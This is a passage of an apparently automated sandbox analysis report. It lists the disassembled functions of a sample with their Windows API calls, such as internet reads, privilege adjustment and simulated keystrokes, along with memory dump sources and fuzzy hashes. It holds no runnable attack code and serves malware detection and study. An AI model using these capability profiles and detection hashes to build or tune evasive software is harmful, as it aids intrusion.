                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00174A1E,00000000), ref: 001755FD
                                                                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00175629
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 599397726-0
                                                                                                                                                          • Opcode ID: 4b1273ac4c500e3d4e43516bc4ff60b8cb9ec588c74e67271d8e6ce6cf36cb8b
                                                                                                                                                          • Instruction ID: 87953ecb8655bdd61bd9ca7d5aae235302bb030dd79bdb93d12ca67eff4526b0
                                                                                                                                                          • Opcode Fuzzy Hash: 4b1273ac4c500e3d4e43516bc4ff60b8cb9ec588c74e67271d8e6ce6cf36cb8b
                                                                                                                                                          • Instruction Fuzzy Hash: 2641E671500A09FFEB159E95DC85EBFB7BEEB40718F10801EF609A6180DBF0AE419A64
                                                                                                                                                          Function 0016EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016EA95
                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0016EAEF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0016EB3C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1682464887-0
                                                                                                                                                          • Opcode ID: aa88f0ce9bf04f0e5fd7691c436aa086dddeaf993a3a48fdd423ac516d62e64a
                                                                                                                                                          • Instruction ID: 2b590c2ecfff70778dcb09bb1a629771a67c9f7a93bc8944fa11cdf93de36b29
                                                                                                                                                          • Opcode Fuzzy Hash: aa88f0ce9bf04f0e5fd7691c436aa086dddeaf993a3a48fdd423ac516d62e64a
                                                                                                                                                          • Instruction Fuzzy Hash: 95215E35A00618EFCB00EFA5E894AEDBBB8FF59314F148099E805E7351DB31D955CB50
                                                                                                                                                          Function 00126670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 739c3ae8466ecba75cd6b10ce7c41a17c5563bbdbd0410de7a8680d0ecb2a20c
                                                                                                                                                          • Instruction ID: d1e136c96f2f67cabfaf88060487a4bf8af683043f91044e3637b185e7de2d10
                                                                                                                                                          • Opcode Fuzzy Hash: 739c3ae8466ecba75cd6b10ce7c41a17c5563bbdbd0410de7a8680d0ecb2a20c
                                                                                                                                                          • Instruction Fuzzy Hash: 99A26C75E00229CFCB28CF58D8806ADBBB1FF49314F2581AAE859AB390D7749D91DF50
                                                                                                                                                          Function 0013AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • GetParent.USER32(?), ref: 0019F4B5
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0013ADDD,?,?,?,00000006,?), ref: 0019F52F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 314495775-0
                                                                                                                                                          • Opcode ID: 1fc25617e817db03fef237f58e4daede17d353c67bbbcc1165f58759366570a9
                                                                                                                                                          • Instruction ID: 229830abc04157b9652dabe4313f908e85c0ddf2739820a0c1f40b3e7c0c50bb
                                                                                                                                                          • Opcode Fuzzy Hash: 1fc25617e817db03fef237f58e4daede17d353c67bbbcc1165f58759366570a9
                                                                                                                                                          • Instruction Fuzzy Hash: C8219635604544BFCF2C8F68D888EAE3BA6EF05360F184264F6298B2E2E7305E52D750
                                                                                                                                                          Function 0016702F Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0016708D
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00167098
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseControlDeviceHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2349616827-0
                                                                                                                                                          • Opcode ID: ee69038c99a339e8331681530bdfbeb2f4951c921d7e63774f09338afe6ae20b
                                                                                                                                                          • Instruction ID: 09a6cd7cb90e6142cadf66dada0529b71579dad82817d7d1fb08e9992c9af037
                                                                                                                                                          • Opcode Fuzzy Hash: ee69038c99a339e8331681530bdfbeb2f4951c921d7e63774f09338afe6ae20b
                                                                                                                                                          • Instruction Fuzzy Hash: B8115E71E04228BFEB108F94EC45BAEBBBCEB4AB10F104152F900E7290D7705A018BA1
                                                                                                                                                          Function 0016FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016FD71
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0016FDA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                          • Opcode ID: 65bbb79f16ee8fd10f07f91b4da034a9aa4b86df9b4425032c6786e70924acfd
                                                                                                                                                          • Instruction ID: 8ef66a41c548491a1477d5a90c24a4decc0c48c54f7a30e5b28bb6e7532fa851
                                                                                                                                                          • Opcode Fuzzy Hash: 65bbb79f16ee8fd10f07f91b4da034a9aa4b86df9b4425032c6786e70924acfd
                                                                                                                                                          • Instruction Fuzzy Hash: 99116D726106009FD710EF68D845A6AB7E8FF99324F00855EF8AA9B291DB34ED158B81
                                                                                                                                                          Function 0018F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0019F352,?,?,?), ref: 0018F115
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0018F0FB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1273190321-0
                                                                                                                                                          • Opcode ID: c900b2847c1dc52bb4bf3b3eee2491bb2ca1f338447769f26f2260b0793a2f4b
                                                                                                                                                          • Instruction ID: f884542c2e955aa56d1ab8459e01a0e37117473745e0c23bb7c977246d87eb40
                                                                                                                                                          • Opcode Fuzzy Hash: c900b2847c1dc52bb4bf3b3eee2491bb2ca1f338447769f26f2260b0793a2f4b
                                                                                                                                                          • Instruction Fuzzy Hash: 2E01B131300604EBCB25AF14EC89F6A7FAAFF86364F140128F9564B6E1C7319952DF50
                                                                                                                                                          Function 0018F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0018F47D
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0019F42E,?,?,?,?,?), ref: 0018F4A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3420055661-0
                                                                                                                                                          • Opcode ID: 3694761890306c90936a6a2e5139da3c76ed24c24960b9235656bc25e3b2ee8b
                                                                                                                                                          • Instruction ID: 6fc025cd13b44ad58782c1bdf69130d1a62c458b18ae24e6759c57b516fc133c
                                                                                                                                                          • Opcode Fuzzy Hash: 3694761890306c90936a6a2e5139da3c76ed24c24960b9235656bc25e3b2ee8b
                                                                                                                                                          • Instruction Fuzzy Hash: A1F03A72410118FFEF049F95EC099BE7FB8FF49351F14401AF902A2560D3B5AA91EB60
                                                                                                                                                          Function 0016D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0017C2E2,?,?,00000000,?), ref: 0016D73F
                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0017C2E2,?,?,00000000,?), ref: 0016D751
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                          • Opcode ID: 831f78d45d1da18324914281cde2d7e2a6025d21c07274eb5f6632e252a5afd7
                                                                                                                                                          • Instruction ID: dfb5c9402865f3295e8f57cc31d2921b9f8e7f307cf0fe5cdfb33004db9b894d
                                                                                                                                                          • Opcode Fuzzy Hash: 831f78d45d1da18324914281cde2d7e2a6025d21c07274eb5f6632e252a5afd7
                                                                                                                                                          • Instruction Fuzzy Hash: 2CF08C3550132DABDB21AFA4EC49FEA776CBF4A361F008125B91AD6181D7709A80CBA1
                                                                                                                                                          Function 00164B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00164B89
                                                                                                                                                          • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00164B9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3536248340-0
                                                                                                                                                          • Opcode ID: 890fa876c7850e46db157eef758283a534b05730f4994c8a197528224f3d9417
                                                                                                                                                          • Instruction ID: 482f2f0d6847f74c7c07e0f57a07eaa86d6494351a99e4d49f92c22becd714b6
                                                                                                                                                          • Opcode Fuzzy Hash: 890fa876c7850e46db157eef758283a534b05730f4994c8a197528224f3d9417
                                                                                                                                                          • Instruction Fuzzy Hash: FDF0677080024EAFEB058FA1C805BBE7BB4EF01305F04840AF962A6291D379C6169FA0
                                                                                                                                                          Function 0015B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0015B8C5
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B8D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                          • Opcode ID: 06fe32bfbe063d7ec0fc3e1032ab7987aaaee44d30decab736ebf6cd1236e802
                                                                                                                                                          • Instruction ID: c1c7b68adc07ce07a3208bbe0bc7ffb07374b8aa8a21bfe38384c26a4ba162e6
                                                                                                                                                          • Opcode Fuzzy Hash: 06fe32bfbe063d7ec0fc3e1032ab7987aaaee44d30decab736ebf6cd1236e802
                                                                                                                                                          • Instruction Fuzzy Hash: 05E0E671004511EFE7262B51FC45D77B7EDEF093117108459F55685870DB719CD1DB10
                                                                                                                                                          Function 0018F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0018F59C
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0019F3AD,?,?,?,?), ref: 0018F5C6
                                                                                                                                                          Memory Dump Source
